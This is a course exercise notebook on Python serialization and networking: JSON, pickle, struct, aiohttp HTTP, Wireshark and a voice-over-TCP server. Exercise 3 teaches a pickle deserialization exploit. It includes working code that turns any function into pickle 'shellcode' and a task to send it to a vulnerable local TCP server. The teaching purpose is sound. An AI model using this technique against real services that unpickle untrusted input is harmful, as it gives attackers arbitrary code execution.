# $\mu$-Exercises

## 0) Refresher (lab automation)
Describe in your own words the principles of communicating with a laboratory instrument. In particular, mention the mainstream interfaces, the way you can communicate with them using Python, the role of `sockets`, the language used to communicate with instruments, and the most important syntax rules.

Write your answer here (double-click to edit): ...

## 1) Serialization with JSON
Deserialize the `json_string` string using the `json` module.

In [None]:
json_string = '[1, 2, 3]'

# STUDENT TASK: Use the `json` module to turn the `json_string` string into a list.
# Hint: Don't forget the import.
...
l = ...

# Check if the outcome is right.
assert l == [1, 2, 3]

## 2) Serialization with `pickle`

In [None]:
import pickle

data = {"aNumber": 1234, "aSet": {1, 2, 3}}

# STUDENT TASK: 
# 1) Try to serialize `data` using `json`. Why does it fail?
# 2) Serialize `data` using `pickle`, store the result in `mu_ex2.dat`.
# 3) Load the data again from the file and deserialize it.

# Hint: use the `pickle.dump` and `pickle.load` functions which allow to write
# and read directly to or from a file.
# They both take an open file handle as the second argument.
# Use `open("myFilename", "wb")` to open a file for writing in binary mode.
# Use "rb" for opening a file for reading in binary mode.
...

# Check if the deserialized data is correct.
assert data_deserialized == data

## 3) HTTP GET - Load search suggestions

Search engines often provide search suggestions while the user is typing.
Startpage.com allows to get search suggestions in the JSON format. As an example the search suggestions for the input `pyth` can be retrieved with the following URL:

https://www.startpage.com/do/suggest?limit=10&lang=english&format=json&query=pyth

Use `aiohttp` to fetch and display search suggestions of a user input.

In [None]:
# Fetch the search suggestions of startpage.com.

import aiohttp
import json

# Ask the user for an input.
print("Enter a query string:")
query = input()

# STUDENT TASK: Create the correct `url` and `params` variables.
url = ...
params = ...

async with aiohttp.ClientSession() as session:
    async with session.get(url, params=params) as resp: # Send a get request
        print("HTTP status:", resp.status)
        
        # Wait for the data to arrive.
        json_text = await resp.text()
        
        # Parse the JSON.
        search_suggestions = json.loads(json_text)
        
        print(f"Search suggestions for {query}:")
        print(search_suggestions[1])
        

## 4) Simple HTTP web server
Create an HTTP web server that displays the current time.

In [None]:

from aiohttp import web
import time

# Hint: use time.asctime()
# Copy and simplify the HTTP server code of the lecture here!

...

# Exercise 1 - Serialize data with `struct`

`struct` can be used to convert between Python values and C-like structs which are represented as byte strings. This also allows to serialize base types in a compact way. `struct` provides two functions `pack()` and `unpack()` for serialization and deserialization. The format of the data to be serialized is specified with *format strings*.

For example to serialize a number as a 32-bit float and another number as a 8-bit *signed* integer the following code can be used:

(For more information see https://docs.python.org/3/library/struct.html. Especially check out the table on format characters https://docs.python.org/3/library/struct.html#format-characters)

In [None]:
import struct

fmt = "fB" # 'f' stands for 32-bit float, 'B' stands for unsigned char/byte.
serialized = struct.pack(fmt, 1.23, 42)
print("serialized =", serialized)

# 32 bits + 8 bits should be exactly 5 bytes.
assert len(serialized) == 5

the_float, the_int = struct.unpack(fmt, serialized)
print("deserialized result:", the_float, the_int) # Notice the error in the float value due to the rounding.

In [None]:
# STUDENT TASK: 'pack' the number '1' into bytes
# once as a 32-bit integer with little-endian byte order
# and once with big-endian byte order.
# Print the results and notice the difference.

...

# Exercise 2 - Inspecting network traffic with Wireshark

This task is recommended but *optional*. The purpose is to briefly introduce the *Wireshark* program.

Network traffic on your computer can be intercepted for inspection. This is a useful tool for debugging if something goes wrong. A well known program for this purpose is *Wireshark* (https://www.wireshark.org/).
Wireshark basically records network packets and displays them in a list. Additionally it allows to filter for and search for certain packets and to inspect the packet content.

Install Wireshark on your computer. Linux users can usually install wireshark from the package manager, it is often called 'wireshark-gtk' or 'wireshark-qt'. Windows and OSX users can find installable packages on the official website.

Run Wireshark. It might require admin/root privileges.

Wireshark allows you to select the network interface. On your laptop there might be multiple ones (wifi, ethernet, vpn). If you are not sure what to choose, select 'any' to see all traffic. Click on 'start' after selecting the network interface.

Soon there should be network packets on the display. Let's filter the packets such that we only see IP packets from or to `httpbin.org`.

In the *Filter* input enter: `ip.host==httpbin.org`

Now the list of packets should be empty.

To get some data, execute the following *unencrypted* (http without *s*) query to 'httpbin.org'

In [None]:
import aiohttp

url = "http://httpbin.org/get"

async with aiohttp.ClientSession() as session:
    async with session.get(url) as resp:
        print("HTTP status:", resp.status)
        print("Response:", await resp.text())

Try to make sense of what you see.

A useful way to inspect a TCP stream is: *right-click on a packet* -> *Follow TCP Stream*.

# Exercise 3 - Remote code execution with Pickle

As mentioned in the lecture `pickle` is dangerous to use. This exercise will illustrate how `pickle.loads` can be forced to execute arbitrary code.

This exercise can be completed without understanding of the pickle language therefore the following subsection is considered optional.

This exercise is largely inspired by https://checkoway.net/musings/pickle/, though adapted for Python 3.

## Understanding the pickle format (optional)

Pickled data is actually a program for a *stack machine* (https://en.wikipedia.org/wiki/Stack_machine). The `pickle.loads()` function executes this program. The pickle language consists of very few commands outlined here.

(This has been copied from https://checkoway.net/musings/pickle/)

* `c`: Read to the newline as the module name, `module`. Read the next line as the object name, `object`. Push `module.object` onto the stack.
* `(`: Insert a marker object onto the stack. This can be used to select a section of the stack for further operations.
* `t`: Pop (take out of the stack in a last-in-first-out manner) objects off the stack until a `(` is popped and create a tuple object containing the objects popped (except for the `()` in the order they were pushed onto the stack. The tuple is pushed onto the stack
* `S`: Read the string in quotes up to the newline and push it onto the stack.
* `R`: Pop a tuple and a callable off the stack and call the callable with the tuple as arguments. Push the result onto the stack.
* `.`: End of the pickle.

The following code shows a byte string that will force `pickle.loads()` to execute the function `__builtin__.print` with the argument `"Hello!"`.

In [None]:
import pickle

# 'shellcode' is traditionally a piece of data that can be used
# to exploit a vulnerability in a program and give access to the *shell*
# on the victim computer.
# Here we only let the victim print "Hello!" for simplicity.

shellcode = b"""c__builtin__
print
(S'Hello!'
tR."""

# This shellcode will do the following.
# At the beginning the stack is empty:
#  Stack = []
# 1. Push `__builtin__.print` onto the stack.
#  Now the stack is:
#  Stack = [__builtin__.print]
# 2. Push `"Hello!"` onto the stack.
#  Stack = [__builtin__.print, "Hello!"]
# 3. Create a tuple `("Hello!", )` and push it on the stack.
#  Stack = [__builtin__.print, ("Hello!", )]
# 4. Call `__builtin__.print` with content of the tuple as arguments.
#  Stack = []

pickle.loads(shellcode)

## Creating shellcode

Understanding the details of this section is optional. The only function `create_shellcode()` will be used for the task.

*Shellcode* is traditionally a piece of data that can be used to exploit a vulnerability in a program and give access to the *shell* (like `bash` or `sh` in the terminal) on the victim computer.

Since Python can execute shell commands (`os.system()`) being able to run arbitrary Python code is equivalent to unconstrained access to the terminal.

The following code converts a function `payload` into *shellcode*, i.e. a byte string that will execute the `payload` function when it is processed by `pickle.loads`.

First we need a way to serialize and deserialize functions. `pickle` does not support serializing functions, therefore the serialization package `marshal` will be used for this as shown in the following code.

In [None]:
import types
import marshal

def payload():
    """
    This function shall be serialized.
    """
    print("Hello, I am the payload function!")
    
# Serialize the code of the payload function.
code_enc = marshal.dumps(payload.__code__)

# Deserialize the payload function.
deserialized_function = (types.FunctionType(marshal.loads(code_enc), globals(), ''))
# Execute the deserialized function.
deserialized_function()

In [None]:
# Create shellcode that will execute the `payload` function in the exploited program.
# Understanding the shellcode is optional.
# This was inspired by: https://checkoway.net/musings/pickle/

import marshal
import base64

def payload():
    """
    This is the code that will be executed during deserialization with pickle.
    """
    print("You have been hacked!")

def create_shellcode(payload_function) -> bytes:
    # Serialize the code of the payload function.
    byte_code = marshal.dumps(payload.__code__)

    # Encode the byte code as Base64.
    # Base64 allows to represent arbitrary bytes as printable ASCII characters.
    byte_code_base64 = base64.b64encode(byte_code)

    shellcode = b"""ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % byte_code_base64
    
    return shellcode

shellcode = create_shellcode(payload)

print(shellcode)


In [None]:
# Feed the shellcode to the vulnerable function.
# This will execute the payload function.
# Notice that the shellcode is just a byte string,
# therefore it can be send over the network or be used to contaminate a file.
pickle.loads(shellcode)

## Student task
The file `01_vulnerable_tcp_server.py` contains code for a server that reads a serialized object from the network and deserializes it. Study and run the server script. Then write code that sends a dict which is serialized with `pickle.dumps()`. Then modify your code in order to hack the server.

In [None]:

# STUDENT TASK
# Connect to the TCP server on localhost:12345 and send it a serialized dict (with `pickle`).
# Hint: Consult the async client script in the folder of Lecture 10.
# Use `pickle.dumps()` to serialize the dict.

...

In [None]:
# STUDENT TASK: Modify your solution from above to send malicious shellcode instead of an
# encoded dict.
# Hint: Use `create_shellcode` to convert a function into shellcode bytes.

...

# Exercise 4 - Voice over TCP/IP

The goal of this exercise is to create a client and a server script for voice calls over the internet. An example in the simplest form is already available in the files `04_01_audio_client.py` and `04_01_audio_echo_server.py`. The client script connects to a TCP server. Once the connection is open the client reads audio data from the microphone and sends the audio data to the server. The server will simply send the audio back to the client. The client interprets all incoming data as an audio signal and forwards it to the speaker.

The client code uses the Python package `pyaudio` for recording and playing sound. Make sure it is installed.

## Task 4.1
Study the two scripts and run them. The goal is to hear your own echo.
The following tasks will build up onto these scripts.

## Task 4.2
Instead of sending the audio signal back to where it came from it should now be sent to all other open connections such that all connected users can hear each other. The `04_audio_client.py` does not have to be changed, instead all the modifications should happen in the file `04_2_audio_server.py` which already contains a few hints. Student tasks are all marked with `STUDENT TASK`.
 
It might be helpful to refresh the chat server exercise of Lecture 10 (Exercise 1).

The chat server from the lecture 10 simply forwarded messages to all other connected clients. This is different for the voice call server: Instead of forwarding independent audio signals the server should mix all individual signals together. More precisely, the server should send back the *sum* of all signals. This reduces bandwidth usage and also makes it possible to reuse the same client script.

## Task 4.2.1 (optional)
Use the scripts to have a chat with your colleagues. For this the server must be accessible to all parties. One possibility is to run the server script on one of the Tardis computers. The clients must be run on the *local* computers in order to access microphone and speaker. Because the Tardis computers are not accessible from the public internet use an *SSH Tunnel* to *tunnel* the connection from your computer to the server on the Tardis machine.

Make sure you are connected to the ETHZ VPN.
```sh
ssh NETHZUSERNAME@tardis-c07.ee.ethz.ch

# Load anaconda.
source /usr/pack/anaconda-3-fg/anaconda3_env.sh

# Upload somehow the server script. For example,
# copy-paste it using the `nano` text editor.

# Run the server script.
python3 serverscript.py --port 1234
```

Or alternatively:
```sh
# This is a hack to upload and execute the script on a tardis machine in one line.
cat 04_02_audio_server.py | ssh NETHZUSERNAME@tardis-c07.ee.ethz.ch "cat > /tmp/server.py && source /usr/pack/anaconda-3-fg/anaconda3_env.sh && python3 /tmp/server.py --port 1234; rm /tmp/server.py"
```

Create an SSH tunnel from another terminal:
```
ssh -L localhost:1234:tardis-c07:1234 NETHZUSERNAME@tardis-c07.ee.ethz.ch
```

Now you can connect to the server on the Tardis as it would be running locally.
```
python3 clientscript.py --server localhost --port 1234
```

You can now either launch two instances of the client script or try to connect to the same server with other colleagues.

### Renting a cheap server
A more professional solution to run the voice call server is to have either a computer that is accessible from the internet or  to rent a virtual private server (VPS). There are many hosting providers. For example a cheap and easy solution can be found on https://www.scaleway.com (requires a credit card, prepaid credit cards also work).

## Task 4.3 (optional)
Extend the server and the client code to support *rooms*. Users should only hear other users in the same room, not everybody else.
Proceed as follows:
* Create copies of the client and server code you used in the previous task. If you could not complete the previous task or need more hints: use the files `04_03_audio_client.py` and `04_03_audio_server.py` instead.
* The client should transmit the room name as a line terminated by `\n` at the very beginning of the connection. This implies that also the server reads a full line before reading audio frames.
* On the server create a dict that holds `AudioMixer` objects for each of the room names. When a client connects to the server the right audio mixer should be chosen based on the room name.